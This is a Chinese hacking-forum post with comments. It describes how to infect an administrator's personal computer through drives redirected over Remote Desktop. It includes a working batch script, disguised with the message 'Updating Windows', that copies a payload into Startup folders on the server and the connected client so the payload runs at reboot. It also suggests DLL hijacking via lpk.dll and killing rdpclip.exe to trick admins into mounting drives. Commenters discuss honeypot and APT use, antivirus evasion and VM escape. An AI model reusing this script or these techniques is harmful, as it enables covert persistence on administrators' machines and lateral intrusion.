远程桌面反向感染管理个人机
前置条件
1.mstsc需要开启驱动器C盘(win2008及以上只需剪切板即可文件传输)
2.win2003 如果要复制文件必须开驱动器
思路:
遍历tsclient的自启动目录 -》 添加执行程序 -》个人机重启 -》 上线
++
猥琐一些的思路:脚本找不到挂载磁盘的情况下直接结束rdpclip.exe 使管理员无法使用剪切板功能,他可能在修复时会挂载上磁盘
++
@ptvip 老司机思路,传lpk.dll
写bat脚本寻找所有挂载磁盘存在的exe文件,把每个目录都写一个lpk.dll
更新关于dll劫持
(lpk.dll只针对xp系统,高于xp的微软已经用KnownDLLs做了防范,需要发现其他的dll进行劫持)
++
@Solo_LD 结合蜜罐,反向搞黑客
@echo off
echo Updating Windows ...
@echo off
timeout 1 >nul 2>&1
mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1
del /q %TEMP%\temp_00.txt >nul 2>&1
set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO (
copy run.bat "%%a" >nul 2>&1
copy C:\temp\run.bat "%%a" >nul 2>&1
copy \\tsclient\c\temp\run.bat "%%a" >nul 2>&1
)
del /q %TEMP%\temp_00.txt >nul 2>&1
评论60次
之前测试过,有几个想法,一个是丢启动项,一个是快捷方式后门,一个是dll劫持结果丢启动项成功。。。。。。
老哥具体怎么利用
很不错的蜜罐钓鱼方法,快到碗里来
2008下 好像这个好像不行啊-.- 提示网络名称什么什么不存在
虚拟机逃逸有可以验证的poc吗。。?
思路不错,学xi了。
我都是虚拟机中远程,这样就算中招了也是虚拟机。
然后再利用3楼的虚拟机逃逸漏洞,然后就GG了,哈哈哈
真正利用还是有难度 毕竟个人pc都有各类杀软
我都是虚拟机中远程,这样就算中招了也是虚拟机。
虚拟机逃逸了呢
虚拟机下能不能反感染个人机呢?
虚拟机的逃逸漏洞 比如这个https://www.zerodayinitiative.com/blog/2017/6/26/use-after-silence-exploiting-a-quietly-patched-uaf-in-vmware
这个exploit找到了么?
xi统盘万一不是C盘就白费了
不知道还有什么方法,很多管理员都不挂盘连mstsc,我反倒觉得这样做容易被管理员干掉
这个思路挺淫荡的。那么过杀软么
好猥琐, 我都是连接好几个磁盘的
思路只猥琐至极,哈哈,打内网渗透神器
这个思路更适合蜜罐使用或者APT去搞运维及办公网
佩服你的头脑.这个题材很新颖.
之前测试过,有几个想法,一个是丢启动项,一个是快捷方式后门,一个是dll劫持 结果丢启动项成功。。。。。。
一般情况不会有人挂载磁盘吧